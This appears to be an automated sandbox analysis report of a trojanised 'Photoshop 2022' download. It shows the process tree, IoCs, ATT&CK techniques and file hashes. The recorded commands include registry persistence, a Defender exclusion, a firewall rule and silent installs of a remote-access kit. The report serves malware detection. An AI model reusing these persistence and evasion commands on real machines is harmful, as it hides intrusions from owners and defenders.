Token: SeIncBasePriorityPrivilege	1152	s2.exe
Token: SeCreatePagefilePrivilege	1152	s2.exe
Token: SeCreatePermanentPrivilege	1152	s2.exe
Token: SeBackupPrivilege	1152	s2.exe
Token: SeRestorePrivilege	1152	s2.exe
Token: SeShutdownPrivilege	1152	s2.exe
Token: SeDebugPrivilege	1152	s2.exe
Token: SeAuditPrivilege	1152	s2.exe
Token: SeSystemEnvironmentPrivilege	1152	s2.exe
Token: SeChangeNotifyPrivilege	1152	s2.exe
Token: SeRemoteShutdownPrivilege	1152	s2.exe
Token: SeUndockPrivilege	1152	s2.exe
Token: SeSyncAgentPrivilege	1152	s2.exe
Token: SeEnableDelegationPrivilege	1152	s2.exe
Token: SeManageVolumePrivilege	1152	s2.exe
Token: SeImpersonatePrivilege	1152	s2.exe
Token: SeCreateGlobalPrivilege	1152	s2.exe
Token: SeCreateTokenPrivilege	1152	s2.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1456	Download Photoshop 2022 3 rar.tmp
1216	s0.tmp
572	wmiprvse.exe
432	iexplore.exe
1152	s2.exe
2492	s4.tmp
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe

Suspicious use of SetWindowsHookEx 16 IoCs

pid	Process
432	iexplore.exe
432	iexplore.exe
1980	IEXPLORE.EXE
1980	IEXPLORE.EXE
1980	IEXPLORE.EXE
1980	IEXPLORE.EXE
1980	WUDFHost.exe
1980	WUDFHost.exe
1980	WUDFHost.exe
1980	WUDFHost.exe
1980	WUDFHost.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1768 wrote to memory of 1456	1768	Download Photoshop 2022 3 rar.exe	28
PID 1768 wrote to memory of 1456	1768	Download Photoshop 2022 3 rar.exe	28
PID 1768 wrote to memory of 1456	1768	Download Photoshop 2022 3 rar.exe	28
PID 1768 wrote to memory of 1456	1768	Download Photoshop 2022 3 rar.exe	28
PID 1768 wrote to memory of 1456	1768	Download Photoshop 2022 3 rar.exe	28
PID 1768 wrote to memory of 1456	1768	Download Photoshop 2022 3 rar.exe	28
PID 1768 wrote to memory of 1456	1768	Download Photoshop 2022 3 rar.exe	28
PID 1456 wrote to memory of 1648	1456	Download Photoshop 2022 3 rar.tmp	29
PID 1456 wrote to memory of 1648	1456	Download Photoshop 2022 3 rar.tmp	29
PID 1456 wrote to memory of 1648	1456	Download Photoshop 2022 3 rar.tmp	29
PID 1456 wrote to memory of 1648	1456	Download Photoshop 2022 3 rar.tmp	29
PID 1456 wrote to memory of 1648	1456	Download Photoshop 2022 3 rar.tmp	29
PID 1456 wrote to memory of 1648	1456	Download Photoshop 2022 3 rar.tmp	29
PID 1456 wrote to memory of 1648	1456	Download Photoshop 2022 3 rar.tmp	29
PID 1648 wrote to memory of 924	1648	setup.exe	30
PID 1648 wrote to memory of 924	1648	setup.exe	30
PID 1648 wrote to memory of 924	1648	setup.exe	30
PID 1648 wrote to memory of 924	1648	setup.exe	30
PID 1648 wrote to memory of 924	1648	setup.exe	30
PID 1648 wrote to memory of 924	1648	setup.exe	30
PID 1648 wrote to memory of 924	1648	setup.exe	30
PID 924 wrote to memory of 1600	924	setup.tmp	33
PID 924 wrote to memory of 1600	924	setup.tmp	33
PID 924 wrote to memory of 1600	924	setup.tmp	33
PID 924 wrote to memory of 1600	924	setup.tmp	33
PID 924 wrote to memory of 1600	924	setup.tmp	33
PID 924 wrote to memory of 1600	924	setup.tmp	33
PID 924 wrote to memory of 1600	924	setup.tmp	33
PID 1600 wrote to memory of 1216	1600	s0.exe	34
PID 1600 wrote to memory of 1216	1600	s0.exe	34
PID 1600 wrote to memory of 1216	1600	s0.exe	34
PID 1600 wrote to memory of 1216	1600	s0.exe	34
PID 1600 wrote to memory of 1216	1600	s0.exe	34
PID 1600 wrote to memory of 1216	1600	s0.exe	34
PID 1600 wrote to memory of 1216	1600	s0.exe	34
PID 1216 wrote to memory of 884	1216	s0.tmp	35
PID 1216 wrote to memory of 884	1216	s0.tmp	35
PID 1216 wrote to memory of 884	1216	s0.tmp	35
PID 1216 wrote to memory of 884	1216	s0.tmp	35
PID 884 wrote to memory of 1660	884	cmd.exe	37
PID 884 wrote to memory of 1660	884	cmd.exe	37
PID 884 wrote to memory of 1660	884	cmd.exe	37
PID 884 wrote to memory of 1660	884	cmd.exe	37
PID 1216 wrote to memory of 1980	1216	s0.tmp	38
PID 1216 wrote to memory of 1980	1216	s0.tmp	38
PID 1216 wrote to memory of 1980	1216	s0.tmp	38
PID 1216 wrote to memory of 1980	1216	s0.tmp	38
PID 1980 wrote to memory of 960	1980	cmd.exe	40
PID 1980 wrote to memory of 960	1980	cmd.exe	40
PID 1980 wrote to memory of 960	1980	cmd.exe	40
PID 1980 wrote to memory of 960	1980	cmd.exe	40
PID 1216 wrote to memory of 572	1216	s0.tmp	41
PID 1216 wrote to memory of 572	1216	s0.tmp	41
PID 1216 wrote to memory of 572	1216	s0.tmp	41
PID 1216 wrote to memory of 572	1216	s0.tmp	41
PID 1216 wrote to memory of 1060	1216	s0.tmp	42
PID 1216 wrote to memory of 1060	1216	s0.tmp	42
PID 1216 wrote to memory of 1060	1216	s0.tmp	42
PID 1216 wrote to memory of 1060	1216	s0.tmp	42
PID 1060 wrote to memory of 432	1060	cmd.exe	45
PID 1060 wrote to memory of 432	1060	cmd.exe	45
PID 1060 wrote to memory of 432	1060	cmd.exe	45
PID 1060 wrote to memory of 432	1060	cmd.exe	45
PID 432 wrote to memory of 1980	432	iexplore.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Download Photoshop 2022 3 rar.exe
"C:\Users\Admin\AppData\Local\Temp\Download Photoshop 2022 3 rar.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1768
- C:\Users\Admin\AppData\Local\Temp\is-NS6G2.tmp\Download Photoshop 2022 3 rar.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-NS6G2.tmp\Download Photoshop 2022 3 rar.tmp" /SL5="$70122,833540,832512,C:\Users\Admin\AppData\Local\Temp\Download Photoshop 2022 3 rar.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1456
- - C:\Users\Admin\AppData\Local\Temp\is-UGUNP.tmp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\is-UGUNP.tmp\setup.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1648
  - - C:\Users\Admin\AppData\Local\Temp\is-RI059.tmp\setup.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-RI059.tmp\setup.tmp" /SL5="$101B6,938139,832512,C:\Users\Admin\AppData\Local\Temp\is-UGUNP.tmp\setup.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies system certificate store
      Suspicious use of WriteProcessMemory
      PID:924
    - - C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 2460
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1600
      - C:\Users\Admin\AppData\Local\Temp\is-17NE9.tmp\s0.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-17NE9.tmp\s0.tmp" /SL5="$10222,10024926,832512,C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 2460
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:1216
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-B8JON.tmp\{app}\hyilyjnhrxpmfieh.cab -F:* %ProgramData%
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:884
        
        C:\Windows\SysWOW64\expand.exe
        
        expand C:\Users\Admin\AppData\Local\Temp\is-B8JON.tmp\{app}\hyilyjnhrxpmfieh.cab -F:* C:\ProgramData
        8⤵
        Drops file in Windows directory
        
        PID:1660
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\wmiprvse.exe" /f
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1980
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe" /f
        8⤵
        
        PID:960
        
        C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe
        
        "C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:572
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i^&c=5306757^&pl=0x00^&pb=1^&px=2460
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1060
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i&c=5306757&pl=0x00&pb=1&px=2460
        8⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:432
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:432 CREDAT:275457 /prefetch:2
        9⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1980
    - - C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s1.exe" /usten SUB=2460
        5⤵
        Executes dropped EXE
        
        PID:1636
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "s1.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s1.exe" & exit
        6⤵
        
        PID:1828
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "s1.exe" /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1760
    - - C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s2.exe" /qn CAMPAIGN="2460"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1152
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Johan.msi" /qn CAMPAIGN=2460 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s2.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1687863241 /qn CAMPAIGN=""2460"" " CAMPAIGN="2460"
        6⤵
        
        PID:2752
    - - C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s3.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2460
      - C:\Users\Admin\AppData\Local\Temp\zazam.exe
        
        C:\Users\Admin\AppData\Local\Temp\zazam.exe
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2536
      - C:\Users\Admin\AppData\Local\Temp\1065961125.exe
        
        C:\Users\Admin\AppData\Local\Temp\1065961125.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        
        PID:1296
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7za.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7za.exe e usoris.7z -oC:\ProgramData\Usoris\Update
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:468
        
        C:\ProgramData\Usoris\Update\Silverlight.Configuration.exe
        
        C:\ProgramData\Usoris\Update\Silverlight.Configuration.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:3044
        
        C:\ProgramData\Usoris\Update\WUDFHost.exe
        
        "C:\ProgramData\Usoris\Update\WUDFHost.exe"
        8⤵
        Sets DLL path for service in the registry
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1980
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c powershell.exe -command Add-MpPreference -ExclusionPath "C:\ProgramData\Usoris\Update"
        9⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Add-MpPreference -ExclusionPath "C:\ProgramData\Usoris\Update"
        10⤵
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        
        PID:2848
      - C:\Users\Admin\AppData\Local\Temp\694862788.exe
        
        C:\Users\Admin\AppData\Local\Temp\694862788.exe
        6⤵
        Executes dropped EXE
        
        PID:1020
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s3.exe & exit
        6⤵
        
        PID:3000
        
        C:\Windows\system32\PING.EXE
        
        ping 0
        7⤵
        Runs ping.exe
        
        PID:2284
    - - C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s4.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /INSTALLERSHOWNELSEWHERE /sid=2460
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1152
      - C:\Users\Admin\AppData\Local\Temp\is-HVKP3.tmp\s4.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HVKP3.tmp\s4.tmp" /SL5="$402AC,16940999,792064,C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s4.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /INSTALLERSHOWNELSEWHERE /sid=2460
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        
        PID:2492
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        "C:\Windows\System32\ipconfig.exe" /flushdns
        7⤵
        Gathers network information
        
        PID:2804
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill.exe" /f /im "Adblock.exe"
        7⤵
        Kills process with taskkill
        
        PID:2776
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill.exe" /f /im "MassiveEngine.exe"
        7⤵
        Kills process with taskkill
        
        PID:1040
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill.exe" /f /im "MassiveExtension.exe"
        7⤵
        Kills process with taskkill
        
        PID:1668
        
        C:\Users\Admin\Programs\Adblock\Adblock.exe
        
        "C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=bc37d64d1687870510 --downloadDate=2023-06-27T12:55:08 --distId=marketator2 --sid=2460
        7⤵
        Drops startup file
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Modifies Internet Explorer settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1628
        
        C:\Users\Admin\Programs\Adblock\crashpad_handler.exe
        
        C:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.5.0&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\log.txt" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\8d03a875-5103-43ba-1f31-3390fcfbb988.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\8d03a875-5103-43ba-1f31-3390fcfbb988.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\8d03a875-5103-43ba-1f31-3390fcfbb988.run\__sentry-breadcrumb2" --initial-client-data=0x1e4,0x1e8,0x1ec,0x1b8,0x1f0,0x13fb1d340,0x13fb1d358,0x13fb1d370
        8⤵
        Executes dropped EXE
        
        PID:1532
        
        C:\Windows\system32\netsh.exe
        
        C:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE
        8⤵
        Modifies Windows Firewall
        
        PID:288
        
        C:\Users\Admin\Programs\Adblock\DnsService.exe
        
        C:\Users\Admin\Programs\Adblock\DnsService.exe /abfpid:1628
        8⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1252
        
        C:\Users\Admin\Programs\Adblock\MassiveExtension.exe
        
        C:\Users\Admin\Programs\Adblock\MassiveExtension.exe proxy --dumps_path "C:\Users\Admin\AppData\Roaming\Adblock Fast\Massive\crashdumps" --h_path "C:\Users\Admin\Programs\Adblock\crashpad_handler.exe" --log_path "C:\Users\Admin\AppData\Roaming\Adblock Fast\Massive\logs" --src https://[email protected]/5375291 --allow_reporting true --version 0.16.0 --env prod --product_id massivesdk
        8⤵
        Executes dropped EXE
        
        PID:2668
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"
        7⤵
        
        PID:3040
        
        C:\Windows\system32\reg.exe
        
        reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f
        8⤵
        
        PID:2092
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c "reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f"
        7⤵
        
        PID:3060
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f
        8⤵
        Modifies registry key
        
        PID:2976
    - - C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s5.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:2072

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F1319B47D9CEAA0317DB8986BA03D946 C
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:2220
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 27338FB724D729BBE1DC54000524FCB1
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:2908
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:3008
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 5E173B521BBACF6D76DF18A4C0515B27 M Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:2800

C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "WUDFHostController" -svcr "WUDFHost.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1960

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\6db8e7.rbs

Filesize
200KB

MD5
d3b4a057ceef1a4243871ba43356fcdf

SHA1
4fa149505a806d215d5b104efa242f978ba3a152

SHA256
f136f63daeb0c6b38977b528c277190e893fd483a74dadf31589b88dfc28806a

SHA512
ad1a284e6af39bf2078ddaca07a6619505f972d236879f38166e1beaedf7cb0bd12a5a2abcf001fb8bb6689f8618c2d5af806e3960e17eb8c6037b33f5780441

Download Submit
C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini

Filesize
253B

MD5
9181075d578726b9301c635699102b15

SHA1
40d8a60b7bf5bf5e91ddf79db66eb9c8fd10ed88

SHA256
e522ca1d143e17d355698301fd4c137a6ab1e8c4b86a754f247a639a5e584097

SHA512
ce4aa944154acdb4357b668a366800a090a34d553799351200807d5c6fb59e2c0918cbe4768d4a6761c9be7ab6ea699cb1f7cd50bd6802e1ad2914ec57ac66c8

Download Submit
C:\ProgramData\regid.1993-06.com.microsoft\HTCTL32.DLL

Filesize
320KB

MD5
c94005d2dcd2a54e40510344e0bb9435

SHA1
55b4a1620c5d0113811242c20bd9870a1e31d542

SHA256
3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

SHA512
2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

Download Submit
C:\ProgramData\regid.1993-06.com.microsoft\MSVCR100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\ProgramData\regid.1993-06.com.microsoft\NSM.LIC

Filesize
195B

MD5
e9609072de9c29dc1963be208948ba44

SHA1
03bbe27d0d1ba651ff43363587d3d6d2e170060f

SHA256
dc6a52ad6d637eb407cc060e98dfeedcca1167e7f62688fb1c18580dd1d05747

SHA512
f0e26aa63b0c7f1b31074b9d6eef88d0cfbc467f86b12205cb539a45b0352e77ce2f99f29baeab58960a197714e72289744143ba17975699d058fe75d978dfd0

Download Submit
C:\ProgramData\regid.1993-06.com.microsoft\PCICL32.dll

Filesize
3.6MB

MD5
d3d39180e85700f72aaae25e40c125ff

SHA1
f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

SHA256
38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

SHA512
471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

Download Submit
C:\ProgramData\regid.1993-06.com.microsoft\TCCTL32.DLL

Filesize
387KB

MD5
2c88d947a5794cf995d2f465f1cb9d10

SHA1
c0ff9ea43771d712fe1878dbb6b9d7a201759389

SHA256
2b92ea2a7d2be8d64c84ea71614d0007c12d6075756313d61ddc40e4c4dd910e

SHA512
e55679ff66ded375a422a35d0f92b3ac825674894ae210dbef3642e4fc232c73114077e84eae45c6e99a60ef4811f4a900b680c3bf69214959fa152a3dfbe542

Download Submit
C:\ProgramData\regid.1993-06.com.microsoft\client32.ini

Filesize
631B

MD5
d978136a5cf0bf9a80ecf111a639e1c8

SHA1
e853e7ffdb031425173480409947e852e152b1d6

SHA256
0a78694c9e6673fa7ce964d02d6395c896bb649d2696fe7b5465222bb03a1f58

SHA512
354206213394ba2ea55427af11d9f6c9aa9af9d12b86b158559377b4ed1c8a9388f49f5016c93d9c7ee281cfd371e3ef080d99fc51ed5e063db1f6e8d730d933

Download Submit
C:\ProgramData\regid.1993-06.com.microsoft\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
C:\ProgramData\regid.1993-06.com.microsoft\pcichek.dll

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
